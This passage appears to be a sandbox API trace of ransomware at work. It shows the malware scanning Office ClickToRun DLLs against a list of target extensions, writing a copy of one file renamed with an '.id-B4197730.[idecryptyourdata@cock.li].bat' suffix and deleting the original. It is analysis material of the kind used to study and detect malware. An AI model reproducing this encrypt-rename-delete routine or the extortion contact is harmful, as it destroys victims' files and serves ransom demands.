returned 1 [0181.362] lstrlenW (lpString=".docx") returned 5 [0181.362] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0181.362] lstrlenW (lpString=".pdf") returned 4 [0181.362] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.363] lstrlenW (lpString=".xls") returned 4 [0181.363] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.363] lstrlenW (lpString=".xlsx") returned 5 [0181.363] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0181.363] lstrlenW (lpString=".ppt") returned 4 [0181.363] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 80 [0181.363] lstrlenW (lpString=".zip") returned 4 [0181.363] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.363] lstrlenW (lpString=".rar") returned 4 [0181.363] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.363] lstrlenW (lpString=".bz2") returned 4 [0181.363] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.363] lstrlenW (lpString=".7z") returned 3 [0181.363] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 80 [0181.363] lstrlenW (lpString=".dbf") returned 4 [0181.363] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 80 [0181.363] lstrlenW (lpString=".1cd") returned 4 [0181.363] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 80 [0181.363] lstrlenW (lpString=".jpg") returned 4 [0181.363] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.363] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0181.363] lstrlenW (lpString="msointl30.en-us.dll") returned 19 [0181.364] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0181.364] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=61024) returned 1 [0181.364] CloseHandle (hObject=0x358) returned 1 [0181.364] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll")) returned 0x20 [0181.364] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.364] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0181.365] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.365] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.365] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0181.365] GetLastError () returned 0x0 [0181.365] ReadFile (in: hFile=0x358, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0xee60, lpOverlapped=0x0) returned 1 [0181.461] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xee70, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xee70, lpOverlapped=0x0) returned 1 [0181.462] ReadFile (in: hFile=0x358, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.462] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xfa, lpOverlapped=0x0) returned 1 [0181.463] SetEndOfFile (hFile=0x35c) returned 1 [0181.463] CloseHandle (hObject=0x35c) returned 1 [0181.463] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.463] SetEndOfFile (hFile=0x358) returned 1 [0181.464] CloseHandle (hObject=0x358) returned 1 [0181.464] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0181.464] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll")) returned 1 [0181.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 77 [0181.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 77 [0181.464] lstrlenW (lpString=".doc") returned 4 [0181.464] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.464] lstrlenW (lpString=".docx") returned 5 [0181.465] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0181.465] lstrlenW (lpString=".pdf") returned 4 [0181.465] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.465] lstrlenW (lpString=".xls") returned 4 [0181.465] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.465] lstrlenW (lpString=".xlsx") returned 5 [0181.465] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0181.465] lstrlenW (lpString=".ppt") returned 4 [0181.465] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 77 [0181.465] lstrlenW (lpString=".zip") returned 4 [0181.465] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.465] lstrlenW (lpString=".rar") returned 4 [0181.465] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.465] lstrlenW (lpString=".bz2") returned 4 [0181.465] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.465] lstrlenW (lpString=".7z") returned 3 [0181.465] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 77 [0181.465] lstrlenW (lpString=".dbf") returned 4 [0181.465] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 77 [0181.465] lstrlenW (lpString=".1cd") returned 4 [0181.465] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 77 [0181.465] lstrlenW (lpString=".jpg") returned 4 [0181.465] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 77 [0181.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 77 [0181.465] lstrlenW (lpString=".doc") returned 4 [0181.465] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.465] lstrlenW (lpString=".docx") returned 5 [0181.465] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0181.465] lstrlenW (lpString=".pdf") returned 4 [0181.466] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.466] lstrlenW (lpString=".xls") returned 4 [0181.466] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.466] lstrlenW (lpString=".xlsx") returned 5 [0181.466] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0181.466] lstrlenW (lpString=".ppt") returned 4 [0181.466] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 77 [0181.466] lstrlenW (lpString=".zip") returned 4 [0181.466] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.466] lstrlenW (lpString=".rar") returned 4 [0181.466] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.466] lstrlenW (lpString=".bz2") returned 4 [0181.466] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.466] lstrlenW (lpString=".7z") returned 3 [0181.466] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 77 [0181.466] lstrlenW (lpString=".dbf") returned 4 [0181.466] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 77 [0181.466] lstrlenW (lpString=".1cd") returned 4 [0181.466] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 77 [0181.466] lstrlenW (lpString=".jpg") returned 4 [0181.466] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.466] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0181.466] lstrlenW (lpString="msvcp120.dll") returned 12 [0181.466] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0181.467] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=660136) returned 1 [0181.467] CloseHandle (hObject=0x358) returned 1 [0181.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll")) returned 0x20 [0181.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.467] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0181.467] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 70 [0181.467] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 70 [0181.467] lstrlenW (lpString=".doc") returned 4 [0181.467] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.467] lstrlenW (lpString=".docx") returned 5 [0181.467] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0181.467] lstrlenW (lpString=".pdf") returned 4 [0181.468] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.468] lstrlenW (lpString=".xls") returned 4 [0181.468] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.468] lstrlenW (lpString=".xlsx") returned 5 [0181.468] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0181.468] lstrlenW (lpString=".ppt") returned 4 [0181.468] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 70 [0181.468] lstrlenW (lpString=".zip") returned 4 [0181.468] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.468] lstrlenW (lpString=".rar") returned 4 [0181.468] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.468] lstrlenW (lpString=".bz2") returned 4 [0181.468] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.468] lstrlenW (lpString=".7z") returned 3 [0181.468] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 70 [0181.468] lstrlenW (lpString=".dbf") returned 4 [0181.468] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 70 [0181.468] lstrlenW (lpString=".1cd") returned 4 [0181.468] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 70 [0181.468] lstrlenW (lpString=".jpg") returned 4 [0181.468] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 70 [0181.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 70 [0181.468] lstrlenW (lpString=".doc") returned 4 [0181.468] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.468] lstrlenW (lpString=".docx") returned 5 [0181.468] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0181.468] lstrlenW (lpString=".pdf") returned 4 [0181.469] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.469] lstrlenW (lpString=".xls") returned 4 [0181.469] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.469] lstrlenW (lpString=".xlsx") returned 5 [0181.469] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0181.469] lstrlenW (lpString=".ppt") returned 4 [0181.469] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 70 [0181.469] lstrlenW (lpString=".zip") returned 4 [0181.469] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.469] lstrlenW (lpString=".rar") returned 4 [0181.469] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.469] lstrlenW (lpString=".bz2") returned 4 [0181.469] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.469] lstrlenW (lpString=".7z") returned 3 [0181.469] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 70 [0181.469] lstrlenW (lpString=".dbf") returned 4 [0181.469] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 70 [0181.469] lstrlenW (lpString=".1cd") returned 4 [0181.469] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.469] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll") returned 70 [0181.469] lstrlenW (lpString=".jpg") returned 4 [0181.469] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.469] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0181.469] lstrlenW (lpString="msvcp140.dll") returned 12 [0181.469] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0181.470] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=635040) returned 1 [0181.470] CloseHandle (hObject=0x358) returned 1 [0181.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll")) returned 0x20 [0181.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.470] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0181.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 70 [0181.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 70 [0181.470] lstrlenW (lpString=".doc") returned 4 [0181.470] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.470] lstrlenW (lpString=".docx") returned 5 [0181.470] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0181.470] lstrlenW (lpString=".pdf") returned 4 [0181.470] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.470] lstrlenW (lpString=".xls") returned 4 [0181.471] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.471] lstrlenW (lpString=".xlsx") returned 5 [0181.471] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0181.471] lstrlenW (lpString=".ppt") returned 4 [0181.471] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 70 [0181.471] lstrlenW (lpString=".zip") returned 4 [0181.471] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.471] lstrlenW (lpString=".rar") returned 4 [0181.471] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.471] lstrlenW (lpString=".bz2") returned 4 [0181.471] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.471] lstrlenW (lpString=".7z") returned 3 [0181.471] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 70 [0181.471] lstrlenW (lpString=".dbf") returned 4 [0181.471] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 70 [0181.471] lstrlenW (lpString=".1cd") returned 4 [0181.471] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 70 [0181.471] lstrlenW (lpString=".jpg") returned 4 [0181.471] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 70 [0181.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 70 [0181.471] lstrlenW (lpString=".doc") returned 4 [0181.471] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.471] lstrlenW (lpString=".docx") returned 5 [0181.471] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0181.471] lstrlenW (lpString=".pdf") returned 4 [0181.471] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.471] lstrlenW (lpString=".xls") returned 4 [0181.472] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.472] lstrlenW (lpString=".xlsx") returned 5 [0181.472] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0181.472] lstrlenW (lpString=".ppt") returned 4 [0181.472] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 70 [0181.472] lstrlenW (lpString=".zip") returned 4 [0181.472] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.472] lstrlenW (lpString=".rar") returned 4 [0181.472] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.472] lstrlenW (lpString=".bz2") returned 4 [0181.472] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.472] lstrlenW (lpString=".7z") returned 3 [0181.472] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 70 [0181.472] lstrlenW (lpString=".dbf") returned 4 [0181.472] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 70 [0181.472] lstrlenW (lpString=".1cd") returned 4 [0181.472] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 70 [0181.472] lstrlenW (lpString=".jpg") returned 4 [0181.472] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.472] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0181.472] lstrlenW (lpString="msvcr120.dll") returned 12 [0181.472] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0181.473] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=963240) returned 1 [0181.473] CloseHandle (hObject=0x358) returned 1 [0181.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll")) returned 0x20 [0181.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.473] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0181.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 70 [0181.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 70 [0181.473] lstrlenW (lpString=".doc") returned 4 [0181.473] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.473] lstrlenW (lpString=".docx") returned 5 [0181.473] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0181.473] lstrlenW (lpString=".pdf") returned 4 [0181.473] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.473] lstrlenW (lpString=".xls") returned 4 [0181.473] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.473] lstrlenW (lpString=".xlsx") returned 5 [0181.473] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0181.473] lstrlenW (lpString=".ppt") returned 4 [0181.473] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 70 [0181.474] lstrlenW (lpString=".zip") returned 4 [0181.474] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.474] lstrlenW (lpString=".rar") returned 4 [0181.474] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.474] lstrlenW (lpString=".bz2") returned 4 [0181.474] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.474] lstrlenW (lpString=".7z") returned 3 [0181.474] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 70 [0181.474] lstrlenW (lpString=".dbf") returned 4 [0181.474] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 70 [0181.474] lstrlenW (lpString=".1cd") returned 4 [0181.474] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 70 [0181.474] lstrlenW (lpString=".jpg") returned 4 [0181.474] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 70 [0181.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 70 [0181.474] lstrlenW (lpString=".doc") returned 4 [0181.474] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.474] lstrlenW (lpString=".docx") returned 5 [0181.474] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0181.474] lstrlenW (lpString=".pdf") returned 4 [0181.474] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.474] lstrlenW (lpString=".xls") returned 4 [0181.474] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.474] lstrlenW (lpString=".xlsx") returned 5 [0181.474] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0181.474] lstrlenW (lpString=".ppt") returned 4 [0181.475] lstrcmpiW 